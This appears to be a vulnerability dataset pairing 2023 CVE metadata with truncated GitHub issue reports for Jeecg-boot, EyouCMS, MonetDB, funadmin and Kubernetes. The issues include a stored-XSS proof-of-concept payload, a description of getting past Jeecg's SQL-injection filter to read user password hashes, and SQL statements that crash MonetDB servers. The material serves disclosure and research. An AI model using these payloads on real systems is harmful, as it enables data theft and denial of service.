### What happened? A security issue was discovered in Kubelet that allows pods to bypass the seccomp profile enforcement. This issue has been rated LOW ([CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N)) (score: 3.4). If you have...
CVE-2023-2431: Bypass of seccomp profile enforcement
https://api.github.com/repos/kubernetes/kubernetes/issues/118690/comments
6
2023-06-15T14:42:32Z
2023-09-29T21:16:18Z
https://github.com/kubernetes/kubernetes/issues/118690
1,758,988,605
118,690
CVE-2023-34659
2023-06-16T18:15:09.437
jeecg-boot 3.5.0 and 3.5.1 have a SQL injection vulnerability the id parameter of the /jeecg-boot/jmreport/show interface.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "in...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Vendor Advisory" ], "url": "https://github.com/jeecgboot/jeecg-boot/issues/4976" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Vendor Advisory" ], "url": "https://github.com/...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jeecg:jeecg_boot:3.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "FEDFF952-7B1F-44EB-98BA-265CB22D6FB3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclu...
[ "89" ]
89
https://github.com/jeecgboot/jeecg-boot/issues/4976
[ "Exploit", "Vendor Advisory" ]
github.com
[ "jeecgboot", "jeecg-boot" ]
##### 版本号: JECG3.5.1 And JECG3.5.0 ##### 前端版本:vue3版?还是 vue2版? vue3 ##### 问题描述: After testing, it was found that the id parameter of the/jeecg-boot/jmreport/show interface of jeecg-boot has SQL injection and is unauthorized. ##### 截图&代码: Download and use https://github.com/jeecgboot/jeecg-boot Aft...
Unauthorized SQL injection in Jeecg3.5.0 and 3.5.1
https://api.github.com/repos/jeecgboot/JeecgBoot/issues/4976/comments
3
2023-05-25T02:08:54Z
2023-06-18T13:06:06Z
https://github.com/jeecgboot/JeecgBoot/issues/4976
1,724,968,984
4,976
CVE-2023-34660
2023-06-16T18:15:09.483
jjeecg-boot V3.5.0 has an unauthorized arbitrary file upload in /jeecg-boot/jmreport/upload interface.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "inte...
[ { "source": "cve@mitre.org", "tags": [ "Exploit" ], "url": "https://github.com/jeecgboot/jeecg-boot/issues/4990" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit" ], "url": "https://github.com/jeecgboot/jeecg-boot/issues/4990" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jeecg:jeecg_boot:3.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "FEDFF952-7B1F-44EB-98BA-265CB22D6FB3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclu...
[ "434" ]
434
https://github.com/jeecgboot/jeecg-boot/issues/4990
[ "Exploit" ]
github.com
[ "jeecgboot", "jeecg-boot" ]
##### 版本号: 目前确定影响:3.5.0 & 3.5.1(其它版本未验证) ##### 前端版本:vue3版?还是 vue2版? vue3版 ##### 问题描述: 经测试发现/jeecg-boot/jmreport/upload接口存在未授权任意文件上传,可以上传html文件造成存储型的XSS。 ##### 截图&代码: 下载使用https://github.com/jeecgboot/jeecg-boot项目源代码启动项目后, 入口:“报表设计器”-->"新建报表"-->"插入图片" 抓取包,获得上传接口,下面证明任意文件上传的存在。 ![image](https://github.com/...
/jeecg-boot/jmreport/upload接口存在未授权任意文件上传
https://api.github.com/repos/jeecgboot/JeecgBoot/issues/4990/comments
4
2023-05-28T14:23:40Z
2023-09-04T09:33:58Z
https://github.com/jeecgboot/JeecgBoot/issues/4990
1,729,493,887
4,990
CVE-2023-34657
2023-06-19T04:15:10.873
A stored cross-site scripting (XSS) vulnerability in Eyoucms v1.6.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the web_recordnum parameter.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/weng-xianhu/eyoucms/issues/43" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/weng-...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:eyoucms:eyoucms:1.6.2:*:*:*:*:*:*:*", "matchCriteriaId": "5B87F220-D05C-4885-8C0E-E5BD8D8DFB66", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
[ "79" ]
79
https://github.com/weng-xianhu/eyoucms/issues/43
[ "Exploit", "Issue Tracking" ]
github.com
[ "weng-xianhu", "eyoucms" ]
There is a storage type cross site scripting vulnerability in the filing number of the Basic Information tab on the backend management page of EyouCMS v1.6.2 ![image](https://github.com/weng-xianhu/eyoucms/assets/81916226/21410c7b-37de-4a3d-abc8-6715b26747f9) ![image](https://github.com/weng-xianhu/eyoucms/assets/8...
EyouCMS v1.6.2 has stored xss
https://api.github.com/repos/weng-xianhu/eyoucms/issues/43/comments
0
2023-05-26T11:19:34Z
2024-03-22T06:50:31Z
https://github.com/weng-xianhu/eyoucms/issues/43
1,727,428,755
43
CVE-2023-34602
2023-06-19T06:15:09.047
JeecgBoot up to v 3.5.1 was discovered to contain a SQL injection vulnerability via the component queryTableDictItemsByCode at org.jeecg.modules.api.controller.SystemApiController.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Vendor Advisory" ], "url": "https://github.com/jeecgboot/jeecg-boot/issues/4983" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking",...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jeecg:jeecgboot:*:*:*:*:*:*:*:*", "matchCriteriaId": "10C93285-2128-4E13-8F27-3BA2A037D4E6", "versionEndExcluding": null, "versionEndIncluding": "3.5.1", "versionStartExcludi...
[ "89" ]
89
https://github.com/jeecgboot/jeecg-boot/issues/4983
[ "Exploit", "Issue Tracking", "Patch", "Vendor Advisory" ]
github.com
[ "jeecgboot", "jeecg-boot" ]
##### 版本号: 3.5.1以及之前的所有版本 ##### 前端版本:vue3版?还是 vue2版? vue3版 ##### 问题描述: 代码中存在SQL注入风险。尽管代码中添加SQL注入的过滤功能,但我们测试发现访问```org.jeecg.modules.api.controller.SystemApiController```类中的```queryTableDictItemsByCode```方法还是能通过特殊的字符串获取数据表中我们想要的数据,例如sys_user表中的用户名,密码和salt值。详细请见截图中的URL,其中“--”符号表示注释,通过该符号屏蔽后续SQL语句,其主要原因是mybatis中$...
SQL Injection in 3.5.1
https://api.github.com/repos/jeecgboot/JeecgBoot/issues/4983/comments
3
2023-05-26T13:33:03Z
2023-06-07T06:02:29Z
https://github.com/jeecgboot/JeecgBoot/issues/4983
1,727,638,418
4,983
CVE-2023-34603
2023-06-19T06:15:09.180
JeecgBoot up to v 3.5.1 was discovered to contain a SQL injection vulnerability via the component queryFilterTableDictInfo at org.jeecg.modules.api.controller.SystemApiController.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/jeecgboot/jeecg-boot/issues/4984" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Vendor ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jeecg:jeecgboot:*:*:*:*:*:*:*:*", "matchCriteriaId": "10C93285-2128-4E13-8F27-3BA2A037D4E6", "versionEndExcluding": null, "versionEndIncluding": "3.5.1", "versionStartExcludi...
[ "89" ]
89
https://github.com/jeecgboot/jeecg-boot/issues/4984
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "jeecgboot", "jeecg-boot" ]
##### 版本号: 3.5.1以及之前的所有版本 ##### 前端版本:vue3版?还是 vue2版? vue3版 ##### 问题描述: 与问题https://github.com/jeecgboot/jeecg-boot/issues/4983 类似,访问```org.jeecg.modules.api.controller.SystemApiController```类中的```queryFilterTableDictInfo```方法会触发SQL注入,根据需求获取数据库中的关键信息。主要原因还是绕过SQL注入检测方法后,Mybatis中的${XXX}存在SQL注入隐患。 Similar to the...
org.jeecg.modules.api.controller.SystemApiController.queryFilterTableDictInfo方法导致SQL注入
https://api.github.com/repos/jeecgboot/JeecgBoot/issues/4984/comments
1
2023-05-26T13:43:23Z
2023-09-04T09:36:15Z
https://github.com/jeecgboot/JeecgBoot/issues/4984
1,727,654,900
4,984
CVE-2023-36362
2023-06-22T14:15:09.687
An issue in the rel_sequences component of MonetDB Server v11.45.17 and v11.46.0 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/MonetDB/MonetDB/issues/7387" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking",...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:monetdb:monetdb:11.45.17:*:*:*:*:*:*:*", "matchCriteriaId": "FDFC7EDE-25CA-42BF-8D78-5EDBF01ED8F3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExc...
[ "89" ]
89
https://github.com/MonetDB/MonetDB/issues/7387
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "MonetDB", "MonetDB" ]
**Describe the bug** MonetDB server 11.46.0 crashes in `rel_sequences` after executing SQL statements through mclient. **To Reproduce** ```sql ALTER SEQUENCE x INCREMENT BY 2; ``` **Expected behavior** Executing statements successfully or throwing errors, instead of breaking down the whole MonetDB server. ...
MonetDB server 11.46.0 crashes in `rel_sequences`
https://api.github.com/repos/MonetDB/MonetDB/issues/7387/comments
2
2023-06-16T18:46:26Z
2024-06-27T13:18:31Z
https://github.com/MonetDB/MonetDB/issues/7387
1,761,141,292
7,387
CVE-2023-36363
2023-06-22T14:15:09.740
An issue in the __nss_database_lookup component of MonetDB Server v11.45.17 and v11.46.0 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/MonetDB/MonetDB/issues/7384" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking",...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:monetdb:monetdb:11.45.17:*:*:*:*:*:*:*", "matchCriteriaId": "FDFC7EDE-25CA-42BF-8D78-5EDBF01ED8F3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExc...
[ "89" ]
89
https://github.com/MonetDB/MonetDB/issues/7384
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "MonetDB", "MonetDB" ]
**Describe the bug** MonetDB server 11.46.0 crashes at `__nss_database_lookup` after executing SQL statements through mclient. **To Reproduce** Use the `mclient` binary to connect MonetDB server and execute the following stmts: ```sql create schema test; drop schema test cascade; create schema test; set sche...
MonetDB server 11.46.0 crashes at `__nss_database_lookup`
https://api.github.com/repos/MonetDB/MonetDB/issues/7384/comments
2
2023-06-16T18:25:56Z
2024-06-27T13:18:29Z
https://github.com/MonetDB/MonetDB/issues/7384
1,761,117,903
7,384
CVE-2023-36364
2023-06-22T14:15:09.790
An issue in the rel_deps component of MonetDB Server v11.45.17 and v11.46.0 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/MonetDB/MonetDB/issues/7386" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking",...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:monetdb:monetdb:11.45.17:*:*:*:*:*:*:*", "matchCriteriaId": "FDFC7EDE-25CA-42BF-8D78-5EDBF01ED8F3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExc...
[ "89" ]
89
https://github.com/MonetDB/MonetDB/issues/7386
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "MonetDB", "MonetDB" ]
**Describe the bug** MonetDB server 11.46.0 crashes in `rel_deps` after executing SQL statements through mclient. **To Reproduce** ```sql CREATE VIEW t2 AS SELECT 1 UNION ALL SELECT 1; CREATE VIEW v2 AS SELECT * FROM t2; ``` **Expected behavior** Executing statements successfully or throwing errors, instead...
MonetDB server 11.46.0 crashes in `rel_deps`
https://api.github.com/repos/MonetDB/MonetDB/issues/7386/comments
1
2023-06-16T18:43:11Z
2024-06-27T13:18:30Z
https://github.com/MonetDB/MonetDB/issues/7386
1,761,137,805
7,386
CVE-2023-36365
2023-06-22T14:15:09.837
An issue in the sql_trans_copy_key component of MonetDB Server v11.45.17 and v11.46.0 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/MonetDB/MonetDB/issues/7378" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking",...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:monetdb:monetdb:11.45.17:*:*:*:*:*:*:*", "matchCriteriaId": "FDFC7EDE-25CA-42BF-8D78-5EDBF01ED8F3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExc...
[ "770" ]
770
https://github.com/MonetDB/MonetDB/issues/7378
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "MonetDB", "MonetDB" ]
**Describe the bug** MonetDB server crashes at sql_trans_copy_key after executing SQL statements through ODBC. **To Reproduce** ```sql START TRANSACTION; CREATE TEMPORARY TABLE temptest3(col int PRIMARY KEY) ON COMMIT DROP; CREATE TEMPORARY TABLE temptest4(col int, FOREIGN KEY (col) REFERENCES temptest3); ``` ...
MonetDB server crashes at sql_trans_copy_key
https://api.github.com/repos/MonetDB/MonetDB/issues/7378/comments
2
2023-06-16T15:58:24Z
2024-06-27T13:18:24Z
https://github.com/MonetDB/MonetDB/issues/7378
1,760,900,711
7,378
CVE-2023-36366
2023-06-22T14:15:09.883
An issue in the log_create_delta component of MonetDB Server v11.45.17 and v11.46.0 allows attackers to cause Denial of Service (DoS) via crafted SQL statements.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/MonetDB/MonetDB/issues/7381" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking",...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:monetdb:monetdb:11.45.17:*:*:*:*:*:*:*", "matchCriteriaId": "FDFC7EDE-25CA-42BF-8D78-5EDBF01ED8F3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExc...
[ "770" ]
770
https://github.com/MonetDB/MonetDB/issues/7381
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "MonetDB", "MonetDB" ]
**Describe the bug** MonetDB server 11.46.0 crashes at `log_create_delta` after executing SQL statements through mclient. **To Reproduce** ```sql CREATE TABLE t1(unique_constraint INT PRIMARY KEY); START TRANSACTION; ALTER TABLE t1 ADD COLUMN uniq_c1_c2_c3 INT; ALTER TABLE t1 DROP COLUMN uniq_c1_c2_c3; COMMIT...
MonetDB server 11.46.0 crashes at `log_create_delta`
https://api.github.com/repos/MonetDB/MonetDB/issues/7381/comments
2
2023-06-16T17:04:12Z
2024-06-27T13:18:27Z
https://github.com/MonetDB/MonetDB/issues/7381
1,761,007,588
7,381
CVE-2023-36367
2023-06-22T14:15:09.930
An issue in the BLOBcmp component of MonetDB Server v11.45.17 and v11.46.0 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/MonetDB/MonetDB/issues/7380" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking",...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:monetdb:monetdb:11.45.17:*:*:*:*:*:*:*", "matchCriteriaId": "FDFC7EDE-25CA-42BF-8D78-5EDBF01ED8F3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExc...
[ "770" ]
770
https://github.com/MonetDB/MonetDB/issues/7380
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "MonetDB", "MonetDB" ]
**Describe the bug** MonetDB server 11.46.0 crashes at `BLOBcmp` after executing SQL statements through mclient. **To Reproduce** ```sql CREATE TABLE a (p_id INT, p_name BLOB); INSERT INTO a VALUES (1,NULL); TRACE select * from a where p_name='Lilu'; ``` **Expected behavior** Executing statements successfu...
MonetDB server 11.46.0 crashes at `BLOBcmp`
https://api.github.com/repos/MonetDB/MonetDB/issues/7380/comments
2
2023-06-16T16:57:43Z
2024-06-27T13:18:26Z
https://github.com/MonetDB/MonetDB/issues/7380
1,760,998,433
7,380
CVE-2023-36368
2023-06-22T14:15:09.977
An issue in the cs_bind_ubat component of MonetDB Server v11.45.17 and v11.46.0 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/MonetDB/MonetDB/issues/7379" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking",...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:monetdb:monetdb:11.45.17:*:*:*:*:*:*:*", "matchCriteriaId": "FDFC7EDE-25CA-42BF-8D78-5EDBF01ED8F3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExc...
[ "770" ]
770
https://github.com/MonetDB/MonetDB/issues/7379
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "MonetDB", "MonetDB" ]
**Describe the bug** MonetDB server crashes at `cs_bind_ubat` after executing SQL statements through ODBC. **To Reproduce** ```sql CREATE TABLE t2 (c1 int, t1 int, c2 int); INSERT INTO t2 VALUES(127,255,1),(127,1,2),(-128,0,3),(-128,2,4),(-1,NULL,5); INSERT INTO t2 VALUES(200,126,1),(250,-127,2); INSERT INTO t...
MonetDB server 11.46.0 crashes at cs_bind_ubat
https://api.github.com/repos/MonetDB/MonetDB/issues/7379/comments
2
2023-06-16T16:52:13Z
2024-06-27T13:18:25Z
https://github.com/MonetDB/MonetDB/issues/7379
1,760,991,161
7,379
CVE-2023-36369
2023-06-22T14:15:10.023
An issue in the list_append component of MonetDB Server v11.45.17 and v11.46.0 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/MonetDB/MonetDB/issues/7383" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking",...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:monetdb:monetdb:11.45.17:*:*:*:*:*:*:*", "matchCriteriaId": "FDFC7EDE-25CA-42BF-8D78-5EDBF01ED8F3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExc...
[ "770" ]
770
https://github.com/MonetDB/MonetDB/issues/7383
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "MonetDB", "MonetDB" ]
**Describe the bug** MonetDB server 11.46.0 crashes at `list_append` after executing SQL statements through mclient. **To Reproduce** ```sql create table t1(c1 int auto_increment primary key NOT NULL); create trigger i1 after insert on t1 for each row insert into t1 values(NULL); insert into t1 values(NULL); `...
MonetDB server 11.46.0 crashes at `list_append`
https://api.github.com/repos/MonetDB/MonetDB/issues/7383/comments
2
2023-06-16T17:58:27Z
2024-06-27T13:18:28Z
https://github.com/MonetDB/MonetDB/issues/7383
1,761,077,451
7,383
CVE-2023-36370
2023-06-22T14:15:10.067
An issue in the gc_col component of MonetDB Server v11.45.17 and v11.46.0 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/MonetDB/MonetDB/issues/7382" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking",...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:monetdb:monetdb:11.45.17:*:*:*:*:*:*:*", "matchCriteriaId": "FDFC7EDE-25CA-42BF-8D78-5EDBF01ED8F3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExc...
[ "770" ]
770
https://github.com/MonetDB/MonetDB/issues/7382
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "MonetDB", "MonetDB" ]
**Describe the bug** MonetDB server 11.46.0 crashes at `gc_col` after executing SQL statements through ODBC. **To Reproduce** 1. Configure the unixODBC with MonetDB ODBC drivers 2. Use the command line like `isql monetdb -v -e` to connect (**to trigger the crash, the '-e' option is necessary.** But I don't know w...
MonetDB server 11.46.0 crashes at `gc_col`
https://api.github.com/repos/MonetDB/MonetDB/issues/7382/comments
2
2023-06-16T17:28:01Z
2024-06-27T13:18:27Z
https://github.com/MonetDB/MonetDB/issues/7382
1,761,035,852
7,382
CVE-2023-36371
2023-06-22T14:15:10.117
An issue in the GDKfree component of MonetDB Server v11.45.17 and v11.46.0 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/MonetDB/MonetDB/issues/7385" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking",...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:monetdb:monetdb:11.45.17:*:*:*:*:*:*:*", "matchCriteriaId": "FDFC7EDE-25CA-42BF-8D78-5EDBF01ED8F3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExc...
[ "770" ]
770
https://github.com/MonetDB/MonetDB/issues/7385
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "MonetDB", "MonetDB" ]
**Describe the bug** MonetDB server 11.46.0 crashes in `GDKfree` after executing SQL statements through mclient. **To Reproduce** 1. Use mclient to connect MonetDB server; 2. Try to execute the following SQL statements **multiple times**. Sometimes they will crash the server. (On my machine, the server crashes af...
MonetDB server 11.46.0 crashes in `GDKfree`
https://api.github.com/repos/MonetDB/MonetDB/issues/7385/comments
3
2023-06-16T18:40:11Z
2023-09-18T07:58:41Z
https://github.com/MonetDB/MonetDB/issues/7385
1,761,134,477
7,385
CVE-2023-36093
2023-06-22T15:15:13.580
There is a storage type cross site scripting (XSS) vulnerability in the filing number of the Basic Information tab on the backend management page of EyouCMS v1.6.3
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/weng-xianhu/eyoucms/issues/44" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:eyoucms:eyoucms:1.6.3:*:*:*:*:*:*:*", "matchCriteriaId": "0DDC6EF0-7D79-4155-B984-0BA7756C05EC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
[ "79" ]
79
https://github.com/weng-xianhu/eyoucms/issues/44
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "weng-xianhu", "eyoucms" ]
There is a storage type cross site scripting vulnerability in the filing number of the Basic Information tab on the backend management page of EyouCMS v1.6.3 poc: <svg><desc><![CDATA[</desc><script>alert(1)</script>]]></svg> ![微信截图_20230608160259](https://github.com/weng-xianhu/eyoucms/assets/59307191/b2441799-875...
EyouCMS v1.6.3 has stored xss
https://api.github.com/repos/weng-xianhu/eyoucms/issues/44/comments
0
2023-06-08T08:06:38Z
2024-03-22T06:48:29Z
https://github.com/weng-xianhu/eyoucms/issues/44
1,747,332,487
44
CVE-2023-36097
2023-06-22T15:15:13.630
funadmin v3.3.2 and v3.3.3 are vulnerable to Insecure file upload via the plugins install.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "in...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/funadmin/funadmin/issues/17" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Vendor Advis...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:funadmin:funadmin:3.3.2:*:*:*:*:*:*:*", "matchCriteriaId": "208E0748-AEF2-4E25-A78D-40F6D9631485", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcl...
[ "434" ]
434
https://github.com/funadmin/funadmin/issues/17
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "funadmin", "funadmin" ]
